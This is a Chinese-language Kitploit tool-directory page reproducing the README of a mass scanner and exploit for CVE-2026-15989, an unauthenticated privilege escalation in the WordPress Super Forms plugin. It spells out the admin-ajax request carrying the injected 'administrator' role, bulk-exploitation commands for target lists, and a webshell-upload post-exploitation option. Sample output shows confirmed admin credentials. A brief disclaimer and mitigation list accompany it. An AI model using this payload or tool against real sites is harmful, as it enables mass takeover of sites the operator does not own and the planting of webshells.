Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

订阅源联系隐私© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/fl0ydsec/cve-2026-15989
权限提升漏洞扫描器Payload生成漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用Web安全渗透测试
GitHubfl0ydsec/cve-2026-15989

CVE-2026-15989

针对 CVE-2026-15989 的大规模扫描与利用工具,该漏洞是 Super Forms <= 6.3.316 中的未认证权限提升漏洞,可通过 role 参数创建管理员账户。

6小时10分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库

CVE-2026-15989 — Super Forms ≤ 6.3.316 — 未认证权限提升 PoC

Super Forms – Drag & Drop Form Builder (WordPress) ≤ 6.3.316 — 通过高级版 Register & Login 插件的 role 参数实现未认证权限提升。

CVE-2026-15989 CVSS WordPress Auth

Author Python Telegram


📋 漏洞概述

属性详情
CVE IDCVE-2026-15989
利用链注册表单 → $other_userdata 中的 'role' → wp_insert_user(role=administrator) → 管理员
严重程度🔴 严重 (CVSS 9.8)
目标Super Forms – Drag & Drop Form Builder + 高级版 Register & Login 插件
受影响版本≤ 6.3.316 (核心) — 存在漏洞的插件构建版本 (v1.x)
修复版本6.3.317
所需认证无

🔍 技术描述

该插件从表单设置中设置新用户的角色 ($userdata['role'] = $settings['register_user_role']),然后遍历 $other_userdata —— 其中包含 'role' —— 并在调用 wp_insert_user() 之前 用客户端提供的值 ($data['role']['value']) 覆盖任何键。

POST /wp-admin/admin-ajax.php  (未认证)
        │
        ▼
action=super_submit_form + data={"role":{"value":"administrator"}, ...}
        │
        ▼
$other_userdata 循环 ─► $userdata['role'] = $data['role']['value']
        │
        ▼
wp_insert_user() ─► 创建管理员账户
        │
        ▼
register_login_activation='login'/'auto' ─► wp_set_auth_cookie ─► 管理员会话

修复 (6.3.317):从白名单中移除 'role' + get_safe_public_registration_role() (故障关闭)。

原创研究 — 双提交协议: 核心在 v5.0.0 更改了协议。

核心Action数据格式Nonce
4.xsuper_send_email嵌套字段 (data[role][value]=...)无 (检查已被注释掉)
5.x/6.xsuper_submit_formJSON 字符串sf_nonce 通过 super_create_nonce

该工具根据检测到的版本自动选择协议。


🚀 使用方法

# 批量扫描 + 利用
python CVE-2026-15989.py --list targets.txt --threads 10 --force --only-hits --results hits.txt --user Floydroot --password 'Floyd@2026!root'
python CVE-2026-15989.py --list targets.txt --threads 15 --timeout 6 --force --quiet --results hits.txt --user U --password P --no-dedup

# 单个目标
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --email EMAIL --insecure
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --login --rce --insecure

# 重新检查现有账户而无需重新注册
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --only-login --insecure
选项描述
--list FILE每行一个目标;每行 URL|form_id 或 URL|form_id=ID,email=X
-u/--target, --port单个目标
--threads, --timeout, --no-dedup批量模式调优
--force即使未检测到注册表单也发送 payload
--only-hits / --quiet仅对确认命中的目标显示树状结构 / 最小化输出
--reset通过丢失密码完成验证模式 (操作员粘贴重置链接)
--only-login跳过注册;登录并通过 users/me 检查角色
--login / --rce真实目标后利用:登录证明 / webshell 插件上传
-k/--insecure忽略 TLS

📊 输出

│  ├─ plugin   : 6.3.316 — VULNERABLE <= 6.3.316
│  ├─ addon    : v1.8.7
│  ├─ form     : 4169 (/register/)
│  ├─ proto    : 5.x/6.x (super_submit_form, JSON, sf_nonce)
│  ├─ payload  : HTTP 200 ✓ processed
│  └─ session  : cookie ✓ · admin confirmed — Floydroot/Floyd@2026!root
└─── ✔ ADMIN CONFIRMED
  • hits.txt — 仅确认的目标 (ts|url|status|detail,包含用户名/密码)
  • 带 ETA 的进度条 + 按状态计数器;每个阶段在失败时打印真实原因 (WAF、崩溃、仅登录表单、协议错误...)

⚙️ 功能特性

  • 双协议 (4.x 嵌套数据 / 5+ JSON+nonce) — 根据版本自动选择
  • 版本检测:readme.txt Stable 标签 + common.js?ver=;插件探测及其自身版本
  • 注册表单发现:常见路径 + sitemap.xml/wp-sitemap.xml/sitemap_index + 首页链接
  • 自动填充必填字段 (包括隐藏/条件字段)
  • "已存在" → 直接登录证明现有账户
  • 崩溃控制:在不注入角色的情况下重新发送表单,以区分服务器端问题与注入触发的崩溃
  • 通过 /wp-json/wp/v2/users/me?context=edit 进行权威管理员证明 (回退:users.php / dashboard)

📁 文件结构

├── CVE-2026-15989.py   # 批量扫描器 + 利用工具
├── README.md
├── LICENSE
└── .gitignore

⚠️ 免责声明

╔══════════════════════════════════════════════════════════════════╗
║                        法律免责声明                              ║
╠══════════════════════════════════════════════════════════════════╣
║  本工具仅供教育和授权安全测试目的提供。                          ║
║  仅可在您拥有或获得明确许可的系统上使用。                        ║
║  作者不对任何误用或损害负责。                                    ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ 缓解措施

  1. 将 Super Forms 更新至 6.3.317 (或更高版本),并轮换任何泄露的凭据
  2. 保持 Register & Login 插件更新 (它有自己的版本周期)
  3. 在不需要时移除/禁用已发布的注册表单
  4. 审计 wp-admin/ 用户,查找意外的管理员账户

👤 作者

fl0ydsec (Floydroot)

GitHub Telegram

安全研究

下载工具